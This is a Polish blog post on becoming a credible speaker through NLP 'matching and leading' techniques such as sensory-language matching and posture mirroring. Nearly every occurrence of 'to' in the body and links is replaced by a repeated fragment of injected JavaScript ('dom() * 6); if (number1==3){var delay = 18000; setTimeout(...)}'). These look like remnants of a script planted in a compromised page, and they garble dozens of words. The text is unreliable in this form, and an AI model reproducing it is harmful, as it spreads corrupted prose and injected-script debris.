Jak być wiarygodnym rozmówcą

jak być wiarygodnymWiarygodność dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kluczowa sprawa, jeśli chcemy kogoś przekonać. Trudno spodziewać się, że kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś spełni naszą prośbę czy żądanie, gdy nam nie wierzy. Zrobi dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tylko wtedy, gdy nas się boi 😉 No ale o dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nam chyba nie chodzi…

Na wiarygodność składa się wiele elementów, od naszego wyglądu, znajomości tematu, o którym mówimy po sposób mówienia i atmosferę jaka udało nam się wytworzyć podczas rozmowy/wystąpienia.

Dziś chciałbym przedstawić Ci dwie techniki, dzięki którym szybko staniesz się osobą wiarygodną w oczach odbiorców. Zaczerpnąłem je z NLP, czyli programowania neurolingwistycznego.

Zastanówmy się najpierw, jak dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to się dzieje, że mając nawet świetne, rzeczowe argumenty, nie potrafimy przekonać ludzi do naszego zdania. Dzieje się tak dlatego, bo zapominamy o jednej podstawowej rzeczy…


Zanim zaczniemy przekonywać ludzi np. do naszego pomysłu, powinniśmy dopasować się do rzeczywisdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tości naszego rozmówcy/ słuchaczy.

jak być wiarygodnymO co chodzi?

Trafia do nas zbyt wiele informacji. Nasz umysł nie jest w stanie wszystkiego przetworzyć, dlatego znaczna większość sygnałów docierających do nas z zewnątrz jest usuwana, zniekształcana lub generalizowana. W naszych umysłach powstaje mapa rzeczywisdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tości. Każdy ma swoją mapę i zgodnie z nią postępuje. Dlatego tak częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mamy wrażenie, że nikt nas nie rozumie 😉
To co dla nas jest oczywiste (znaczenie jakiś słów, schematy zachowania) nie jest tak oczywiste dla innych i wtedy pojawiają się tak zwane nieporozumienia, niedomówienia itp.

Dlatego zanim przystąpisz do “prowadzenia” (przekonywania, forsowania swoich pomysłów, argumendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania) dopasuj się do swojego rozmówcy. W NLP obowiązuje podstawowa zasada “Najpierw dopasowanie, potem prowadzenie”.

Możesz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zrobić na dwóch poziomach:

1. dopasowanie werbalne, używając języka preferowanego przez Twojego rozmówcę
2. dopasowanie niewerbalne, odzwierciedlając położenie jego ciała i gesty, których używa.

Podczas prezentacji lub podczas rozmowy indywidualnej możesz mieć do czynienia z trzema typami odbiorców/rozmówców:
1. wzrokowiec: “zobacz, co dla Ciebie przygodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towałem”, “koniecznie przyjrzyj się temu”
2. słuchowiec: “za chwilę omówimy ważne zagadnienie”, “porozmawiamy na interesujący temat”
3. kinestetyk (czuciowiec): “zaraz poczujesz, jakie korzyści przyniesie Ci korzystanie z naszego produktu”.

W każdym z nas są wszystkie systemy reprezentacji, ale zawsze jeden jest dominujący. Zorientuj się (jeśli możesz) jaki system reprezentacji jest najważniejszy dla Twojego rozmówcy i… używaj go. Zauważysz/usłyszysz/poczujesz 🙂 jak dobrze podom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toczy się rozmowa!
Temat ten poruszam w artykule dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-korzystac-z-wsk/”>Wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to korzystać z WSK! KLIK!

Dopasowanie niewerbalne dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to naśladowanie ułożenia ciała (szczególnie kąta między głową a barkami oraz kąta miedzy tułowiem a nogami, w przypadku pozycji siedzącej) oraz sposobu gestykulacji. Proszę nie mylić tego z “papugowaniem” albo “małpowaniem” drugiej osoby. Jeśli złapiemy dobry kontakt z rozmówcą, nawet się nie zorientuje, że odzwierciedlamy jego postawę. Zobacz na osoby będące w dobrym kontakcie podczas rozmowy – nie zdają sobie sprawy, że siedzą, gestykulują tak samo. Z lekkim opóźnieniem modyfikują pozycję, dosdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowując się do rozmówcy. Tak dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to działa.

Dopasowanie niewerbalne łatwiej sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosować w rozmowie jeden na jeden lecz w czasie prezentacji dla większej grupy osób też jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to możliwe. O takich sposobach w pracy z grupą napiszę kiedyś artykuł 😉

Dopiero po “dopasowaniu” przejdź do “prowadzenia” czyli zacznij realizować swoje cele (w kontekście rozmowy dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to może być przekonanie do swojego pomysłu, nakłonienie do wykonania pożądanej akcji)

Jeśli masz już dobry kontakt z rozmówcą lub całym audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium, łatwiej będzie Ci wywrzeć wpływ i przekonać ludzi do podjęcia decyzji zgodnej z Twoimi oczekiwaniami. Skoro jesteśmy do siebie “podobni”, jest miło i sympatycznie, świetnie się rozmawia, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to w takiej atmosferze łatwiej nam poprosić o wykonanie pożądanego działania: zgody na wprowadzenie zmian, przekonanie do naszej idei, “namówienie” do zakupu produktu lub usługi itd. itp.

Ważne: przed prośbą do rozmówcy sprawdź, czy masz z nim dobry kontakt. Zmień np. położenie ciała (odchyl się, zmień układ nóg) i zobacz czy podąża za Tobą. Jeśli tak, bez skrępowania przystąp do wyartykułowania prośby, żądania.

Przy większym audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium trudno zrobić taką “sztuczkę” dlatego tu musisz zdać się na swoją intuicję. Jeśli uznasz, że atmosfera w sali jest dla Ciebie korzystna, działaj. Jeśli nie, spróbuj coś jeszcze poprawić a następnie ruszyć do ataku 😉

Do dzieła!

w artykule wykorzystałem grafiki z serwisu dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.net”>http://www.FreeDigitalPhodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.net

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply